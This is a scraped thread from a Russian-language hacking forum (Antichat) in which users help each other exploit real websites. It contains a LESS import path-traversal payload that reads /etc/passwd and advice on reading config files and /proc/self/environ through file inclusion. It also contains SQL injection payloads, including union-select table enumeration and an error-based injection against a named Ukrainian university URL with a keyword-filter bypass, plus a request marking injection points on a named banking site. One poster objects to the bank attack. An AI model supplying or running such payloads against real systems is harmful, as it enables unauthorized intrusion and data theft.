ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

18.02.2019, 07:32
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме: 540530
Репутация:
54
|
|
нет в etc/passwd такая же фигня ParseError: Unexpected input in passwd on line 1, column 15
|
|
|

18.02.2019, 11:46
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме: 11937
Репутация:
0
|
|
Сообщение от pinch
pinch said:
↑
нет в etc/passwd такая же фигня ParseError: Unexpected input in passwd on line 1, column 15
Ну, 6 строк вывода в ошибке это тоже не плохо. Как вариант, попробуй почитать индексный файл и остальные файлы сайта, очень часто в первых строках идут подключения конфигов и прочих библиотек, возможно прочитав конфиг тебе повезет увидеть в первых 6-ти строках данные для подключения к бд, фтп и тд. (Если конечно эти строки не забитый комментариями разработчиков )
|
|
|

18.02.2019, 12:02
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме: 1698585
Репутация:
818
|
|
/proc/self/environ если инклуд а не читалка просто. ну или ававатрку залей с кодом если есть возможность
|
|
|

18.02.2019, 12:19
|
|
Guest
Сообщений: n/a
Провел на форуме: 169212
Репутация:
441
|
|
Сообщение от pinch
pinch said:
↑
проблема в выводе которая ограничивается 6 строками есть идеи как обойти?
Не нарушать работу парсера. Если есть возможность как-то закинуть свою нагрузку ( пример), можно попробовать так:
Код:
Code:
/style.less?update=e51qf61z&imports[]=../../../../../../../../../../../tmp/your_cool_file.jpg
Содержимое your_cool_file.jpg:
Код:
Code:
@import (inline) "/etc/passwd";
|
|
|
|

20.02.2019, 18:13
|
|
Guest
Сообщений: n/a
Провел на форуме: 56255
Репутация:
2
|
|
Сообщение от man474019
man474019 said:
↑
Hi friends
Can you help me exploit this sql injection
I tried but no result
Spoiler: sqli link
POST /cabinet HTTP/1.1
Content-Length: 31
Content-Type: application/x-www-form-urlencoded
Referer:
https://ne.birkart.az/
Cookie: PHPSESSID=81d5c3c11f885d5bbe968db124eb5453; uslk_e=ZDQ0NmYyZDAtYzQzZC0yOGQxLTQ1MzItMDRhZWI1YmI 2NzUw~~~~~~~1~; uslk_s=Idle%3B0~~0~0~0~~; __cfduid=d9efd55b42b5016584f8a88876936dbaa15408807 19; __cfduid=d9efd55b42b5016584f8a88876936dbaa15408807 19
Host: ne.birkart.az
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
action=check&birthday=1
[injection-here]
&cif=1
[injection-here]
Thanks!
have you?
This is really bad idea to run SQLi attack on banking if they didn't ask you to do.
|
|
|
|

21.02.2019, 19:38
|
|
Guest
Сообщений: n/a
Провел на форуме: 3935
Репутация:
3
|
|
Не обойти?
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'f'[/COLOR][COLOR="#007700"]]); if(!([/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'..'[/COLOR][COLOR="#007700"]) ===[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) ||[/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'./'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]) !=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"./"[/COLOR][COLOR="#007700"]) ===[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) { exit([/COLOR][COLOR="#DD0000"]'FALSE'[/COLOR][COLOR="#007700"]); }[/COLOR][/COLOR]
----------------------------------
$_GET['f'] = 'wrapper://'
$w = $_GET['f];
Возможна ли работа враппера с конкатенацией: './'.$w ?
readfile('./'.$_GET['f']);
|
|
|
|

01.03.2019, 15:40
|
|
Guest
Сообщений: n/a
Провел на форуме: 96779
Репутация:
5
|
|
Там все элементарно крутится
targetname=uIyg' union all select null,database(),null,null-- eqew&status=---
targetname=uIyg' union all select 1,2,(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.tables)where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x),4-- eqew&status=---
и так далее
|
|
|
|

03.03.2019, 08:05
|
|
Guest
Сообщений: n/a
Провел на форуме: 22457
Репутация:
10
|
|
Помогите раскрутить. Начинает фильтровать, как только FROM появляется в любом виде. Коментил, пробовал что то типа "1,2, .3from". Какие есть варианты обойти это?
Код:
Code:
http://onua.edu.ua/index.php?option=com_content&view=article&id=161%20and%20extractvalue(0x0a,concat(0x0a,(select%20database())))--+&Itemid=19&lang=uk
|
|
|
|

03.03.2019, 11:00
|
|
Guest
Сообщений: n/a
Провел на форуме: 58046
Репутация:
13
|
|
Сообщение от BenderMR
BenderMR said:
↑
Помогите раскрутить. Начинает фильтровать, как только FROM появляется в любом виде. Коментил, пробовал что то типа "1,2, .3from". Какие есть варианты обойти это?
Код:
Code:
http://onua.edu.ua/index.php?option=com_content&view=article&id=161%20and%20extractvalue(0x0a,concat(0x0a,(select%20database())))--+&Itemid=19&lang=uk
FRfromOM
|
|
|
|

03.03.2019, 18:11
|
|
Guest
Сообщений: n/a
Провел на форуме: 2386
Репутация:
0
|
|
Сорри, если пишу не туда
WPScan указал версию сайта 4.9.8 и вывел следуюющее:
WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution fixed in version 4.9.9
WordPress
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|